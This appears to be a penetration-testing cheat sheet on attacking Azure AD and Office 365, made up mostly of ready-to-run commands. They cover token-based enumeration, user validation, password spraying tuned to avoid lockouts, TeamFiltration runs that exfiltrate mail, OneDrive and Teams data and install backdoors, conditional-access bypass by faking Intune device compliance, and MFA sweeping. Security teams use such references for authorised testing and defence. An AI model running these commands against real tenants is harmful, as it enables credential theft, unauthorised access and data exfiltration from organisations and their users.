Skip to content

Azure AD Enumerate

Azure AD - Collectors

  • Microsoft Portals - Microsoft Administrator Sites
  • ROADTool - A collection of Azure AD tools for offensive and defensive security purposes 
    roadrecon auth --access-token eyJ0eXA...
roadrecon auth --prt-cookie <primary-refresh-token> -r msgraph -c "1950a258-227b-4e31-a9cf-717495945fc2"
roadrecon gather
roadrecon gui
  • BloodHoundAD/AzureHound - Azure Data Exporter for BloodHound 
    ./azurehound --refresh-token <refresh-token> list --tenant "<target-tenant-id>" -o output.json
./azurehound -u "<username>@contoso.onmicrosoft.com" -p "<password>" list groups --tenant "<tenant>.onmicrosoft.com"
./azurehound -j "<jwt>" list users --tenant "<tenant>.onmicrosoft.com"
  • BloodHoundAD/BARK - BloodHound Attack Research Kit 
    . .\BARK.ps1
$MyRefreshTokenRequest = Get-AZRefreshTokenWithUsernamePassword -username "user@contoso.onmicrosoft.com" -password "MyVeryCoolPassword" -TenantID "contoso.onmicrosoft.com"
$MyMSGraphToken = Get-MSGraphTokenWithRefreshToken -RefreshToken $MyRefreshTokenRequest.refresh_token -TenantID "contoso.onmicrosoft.com"
$MyAADUsers = Get-AllAzureADUsers -Token $MyMSGraphToken.access_token -ShowProgress
  • dafthack/GraphRunner - A Post-exploitation Toolset for Interacting with the Microsoft Graph API 
    Invoke-GraphRecon -Tokens $tokens -PermissionEnum
Invoke-DumpCAPS -Tokens $tokens -ResolveGuids
Invoke-DumpApps -Tokens $tokens
Get-DynamicGroups -Tokens $tokens
  • NetSPI/MicroBurst - MicroBurst includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping 
    PS C:> Import-Module .\MicroBurst.psm1
PS C:> Import-Module .\Get-AzureDomainInfo.ps1
PS C:> Get-AzureDomainInfo -folder MicroBurst -Verbose
  • hausec/PowerZure - PowerShell framework to assess Azure security 
    PS C:> Import-Module .\Powerzure.psd1
PS C:> Set-Subscription -Id [idgoeshere]
PS C:> Get-AzureTarget
PS C:> Get-AzureInTuneScript
PS C:> Show-AzureKeyVaultContent -All
  • Flangvik/TeamFiltration - TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts 
    TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --cookie-dump C:\\CookieData.txt --all
TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --aad 
TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --tokens C:\\OutputTokens.txt --onedrive --owa
TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --teams --owa --owa-limit 5000
TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --debug --exfil --onedrive
TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-teams
TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-msol --usernames C:\Clients\2021\FooBar\OSINT\Usernames.txt
TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --backdoor
TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --database
  • Azure/StormSpotter - ⚠ This repository has not been updated recently - Azure Red Team tool for graphing Azure and Azure Active Directory objects
  • nccgroup/Azucar - ⚠ This repository has been archived - Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.
  • FSecureLABS/Azurite Explorer - ⚠ This repository has not been updated recently - Enumeration and reconnaissance activities in the Microsoft Azure Cloud.
  • cyberark/SkyArk - ⚠ This repository has not been updated recently - Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins.

Azure AD - User Enumeration

Enumerate Tenant Informations

  • Federation with Azure AD or O365 
    Get-AADIntLoginInformation -UserName <USER>@<TENANT NAME>.onmicrosoft.com
https://login.microsoftonline.com/getuserrealm.srf?login=<USER>@<DOMAIN>&xml=1
https://login.microsoftonline.com/getuserrealm.srf?login=root@<TENANT NAME>.onmicrosoft.com&xml=1
  • Get the Tenant ID 
    Get-AADIntTenantID -Domain <TENANT NAME>.onmicrosoft.com
https://login.microsoftonline.com/<DOMAIN>/.well-known/openid-configuration
https://login.microsoftonline.com/<TENANT NAME>.onmicrosoft.com/.well-known/openid-configuration

Enumerate from a Guest Account

powerpwn recon --tenant {tenantId} --cache-path {path}
powerpwn dump -tenant {tenantId} --cache-path {path}
powerpwn gui --cache-path {path}

Enumerate Emails

By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute.

  • Validate email 
    PS> C:\Python27\python.exe C:\Tools\o365creeper\o365creeper.py -f C:\Tools\emails.txt -o C:\Tools\validemails.txt
admin@<TENANT NAME>.onmicrosoft.com   - VALID
root@<TENANT NAME>.onmicrosoft.com    - INVALID
test@<TENANT NAME>.onmicrosoft.com    - VALID
contact@<TENANT NAME>.onmicrosoft.com - INVALID
  • Extract email lists with a valid credentials : https://github.com/nyxgeek/o365recon 
    Install-Module MSOnline
Install-Module AzureAD
.\o365recon.ps1 -azure

Password Spraying

The default lockout policy tolerates 10 failed attempts, then lock out an account for 60 seconds.

  • dafthack/MSOLSpray 
    PS> . C:\Tools\MSOLSpray\MSOLSpray.ps1
PS> Invoke-MSOLSpray -UserList C:\Tools\validemails.txt -Password <PASSWORD> -Verbose
PS> Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020
PS> Invoke-MSOLSpray -UserList .\users.txt -Password d0ntSprayme!
  • 0xZDH/o365spray 
    o365spray --spray -U usernames.txt -P passwords.txt --count 2 --lockout 5 --domain test.com
  • Flangvik/TeamFiltration 
    TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --sleep-min 120 --sleep-max 200 --push --shuffle-users --shuffle-regions
TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --push-locked --months-only --exclude C:\Clients\2021\FooBar\Exclude_Emails.txt
TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --passwords C:\Clients\2021\FooBar\Generic\Passwords.txt --time-window 13:00-22:00

Azure Services Enumeration

Enumerate Tenant Domains

Extract openly available information for the given tenant: aadinternals.com/osint

Invoke-AADIntReconAsOutsider -DomainName <DOMAIN>
Invoke-AADIntReconAsOutsider -Domain "company.com" | Format-Table
Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table

Enumerate Azure Subdomains

PS> . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureSubDomains.ps1
PS> Invoke-EnumerateAzureSubDomains -Base <TENANT NAME> -Verbose
Subdomain Service
--------- -------
<TENANT NAME>.mail.protection.outlook.com Email
<TENANT NAME>.onmicrosoft.com Microsoft Hosted Domain

Enumerate Services

  • Using Az Powershell module 

    # Enumerate resources
PS Az> Get-AzResource

# List all VM's the user has access to
PS Az> Get-AzVM 

# Get all webapps
PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}

# Get all function apps
PS Az> Get-AzFunctionApp

# List all storage accounts
PS Az> Get-AzStorageAccount

# List all keyvaults
PS Az> Get-AzKeyVault

# Get all application objects registered using the current tenant
PS AzureAD> Get-AzureADApplication -All $true

# Enumerate role assignments
PS Az> Get-AzRoleAssignment -Scope /subscriptions/<SUBSCRIPTION-ID>/resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/<VM-NAME>
PS Az> Get-AzRoleAssignment -SignInName test@<TENANT NAME>.onmicrosoft.com

# Check AppID Alternative Names/Display Name 
PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<APP-ID>"} | fl

  • Using az cli 

    PS> az vm list
PS> az vm list --query "[].[name]" -o table
PS> az webapp list
PS> az functionapp list --query "[].[name]" -o table
PS> az storage account list
PS> az keyvault list

Conditional Access Policy

Conditional Access is used to restrict access to resources to compliant devices only.

  • Enumerate Conditional Access Policies: roadrecon plugin policies (query the local database)
CAP Bypass
Location / IP ranges Corporate VPN, Guest Wifi
Platform requirement User-Agent switcher (Android, PS4, Linux, ...)
Protocol requirement Use another protocol (e.g for e-mail acccess: POP, IMAP, SMTP)
Azure AD Joined Device Try to join a VM (Work Access)
Compliant Device (Intune) Fake device compliance
Device requirement /
MFA /
Legacy Protocols /
Domain Joined /

Bypassing conditional access by faking device compliance

# AAD Internals - Making your device compliant
# Get an access token for AAD join and save to cache
Get-AADIntAccessTokenForAADJoin -SaveToCache
# Join the device to Azure AD
Join-AADIntDeviceToAzureAD -DeviceName "SixByFour" -DeviceType "Commodore" -OSVersion "C64"
# Marking device compliant - option 1: Registering device to Intune
# Get an access token for Intune MDM and save to cache (prompts for credentials)
Get-AADIntAccessTokenForIntuneMDM -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx -SaveToCache 
# Join the device to Intune
Join-AADIntDeviceToIntune -DeviceName "SixByFour"
# Start the call back
Start-AADIntDeviceIntuneCallback -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7-MDM.pfx -DeviceName "SixByFour"

Multi Factor Authentication

  • dafthack/MFASweep - A tool for checking if MFA is enabled on multiple Microsoft Services 
    Import-Module .\MFASweep.ps1
Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020
Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020 -Recon -IncludeADFS

References